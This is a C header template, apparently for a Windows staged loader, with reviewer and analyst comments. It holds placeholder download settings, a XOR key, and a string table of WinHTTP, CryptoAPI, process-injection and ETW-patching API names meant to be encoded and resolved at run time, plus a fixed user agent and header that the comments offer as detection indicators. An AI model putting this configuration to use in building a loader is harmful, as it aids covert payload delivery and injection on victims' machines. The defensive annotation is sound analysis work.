#pragma once
/*
 * Build-time configuration and string table (template file).
 *
 * <ISHTTPS>, <PORT>, <PROCESS>, <DOMAIN>, <URL> and <TARGET> are placeholder
 * tokens; this file is not valid C until they are replaced.
 * NOTE(review): presumably a generator script does the substitution -- it is
 * not visible in this file.
 *
 * Every object below is a definition with external linkage placed in a header.
 * `#pragma once` only stops re-inclusion within one translation unit, so
 * including this header from two source files yields duplicate-symbol link
 * errors. `bool` also needs <stdbool.h> when compiled as C.
 *
 * Strings after the "TO XOR" marker are module names, API names and HTTP
 * constants kept as data rather than as imports.
 * NOTE(review): the marker plus XorKey suggest a build step XOR-encodes these
 * strings and the consuming code looks the functions up by name at run time;
 * confirm against the consumer. The marker line and the lines after it are left
 * byte-for-byte unchanged in case the generator parses them.
 * NOTE(review): the four placeholder strings carry no trailing space, unlike
 * the literal names -- presumably the generator supplies it; confirm.
 *
 * Notes for analysts and detection engineers:
 *  - A repeating-key XOR whose key ships next to the data is encoding, not
 *    encryption; the plaintext names are recoverable from a built binary.
 *  - The name set spans WinHTTP download, CryptoAPI hash/derive-key/decrypt,
 *    Toolhelp process and thread enumeration, cross-process allocation and
 *    write, remote thread / APC creation, thread-context changes and
 *    ntdll's EtwEventWrite. That combination is consistent with a staged
 *    loader that injects into another process; the calls themselves remain
 *    visible to behavioural telemetry however the names are stored.
 *  - sUserAgent (a fixed Chrome 91 / Edg 91 string) and sAdditionalHeader
 *    ("OneTimeDownload: ...") are constant per build unless edited, so they
 *    serve as network indicators for proxy and IDS rules.
 */
/* Transport selection and port; both are filled in from placeholders. */
bool isHttps = <ISHTTPS>;
int port = <PORT>;
/* Wide-character module name. It sits above the "TO XOR" marker, so it is
 * presumably left unencoded -- TODO confirm. */
wchar_t wsKernel32DLL[]= L"KERNEL32.DLL";
// TO XOR
// add space at the end of string to give space to '\0'
char XorKey[] = "xorkey";
char sInjectionProcess[] = "<PROCESS>";
char sDomain[] = "<DOMAIN>";
char sUri[] = "<URL>";
char sTarget[] = "<TARGET>";
char sWinhttpDLL[] = "winhttp.dll ";
char sWinHttpOpen[] = "WinHttpOpen ";
char sWinHttpConnect[] = "WinHttpConnect ";
char sWinHttpOpenRequest[] = "WinHttpOpenRequest ";
char sWinHttpSetOption[] = "WinHttpSetOption ";
char sWinHttpSendRequest[] = "WinHttpSendRequest ";
char sWinHttpReceiveResponse[] = "WinHttpReceiveResponse ";
char sWinHttpQueryHeaders[] = "WinHttpQueryHeaders ";
char sWinHttpQueryDataAvailable[] = "WinHttpQueryDataAvailable ";
char sWinHttpReadData[] = "WinHttpReadData ";
char sWinHttpCloseHandle[] = "WinHttpCloseHandle ";
char sWinHttpAddRequestHeaders[] = "WinHttpAddRequestHeaders ";
char sKernel32DLL[] = "kernel32.dll ";
char sGetProcAddress[] = "GetProcAddress ";
char sGetModuleHandleA[] = "GetModuleHandleA ";
char sOpenProcess[] = "OpenProcess ";
char sVirtualAlloc[] = "VirtualAlloc ";
char sVirtualFree[] = "VirtualFree ";
char sVirtualAllocEx[] = "VirtualAllocEx ";
char sWriteProcessMemory[] = "WriteProcessMemory ";
char sCreateRemoteThread[] = "CreateRemoteThread ";
char sLoadLibraryA[] = "LoadLibraryA ";
char sCloseHandle[] = "CloseHandle ";
char sWaitForSingleObject[] = "WaitForSingleObject ";
char sCryptAcquireContextW[] = "CryptAcquireContextW ";
char sCryptCreateHash[] = "CryptCreateHash ";
char sCryptHashData[] = "CryptHashData ";
char sCryptDeriveKey[] = "CryptDeriveKey ";
char sCryptDecrypt[] = "CryptDecrypt ";
char sCryptReleaseContext[] = "CryptReleaseContext ";
char sCryptDestroyHash[] = "CryptDestroyHash ";
char sCryptDestroyKey[] = "CryptDestroyKey ";
char sCreateToolhelp32Snapshot[] = "CreateToolhelp32Snapshot ";
char sProcess32First[] = "Process32First ";
char sProcess32Next[] = "Process32Next ";
char sOpenThread[] = "OpenThread ";
char sSuspendThread[] = "SuspendThread ";
char sResumeThread[] = "ResumeThread ";
char sGetThreadContext[] = "GetThreadContext ";
char sSetThreadContext[] = "SetThreadContext ";
char sThread32Next[] = "Thread32Next ";
char sCreateProcessA[] = "CreateProcessA ";
char sQueueUserAPC[] = "QueueUserAPC ";
char sNtdllDLL[] = "ntdll.dll ";
char sEtwEventWrite[] = "EtwEventWrite ";
char sUserAgent[] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59 ";
char sAdditionalHeader[] = "OneTimeDownload: the the win ";
char sGetComputerName[] = "GetComputerNameA ";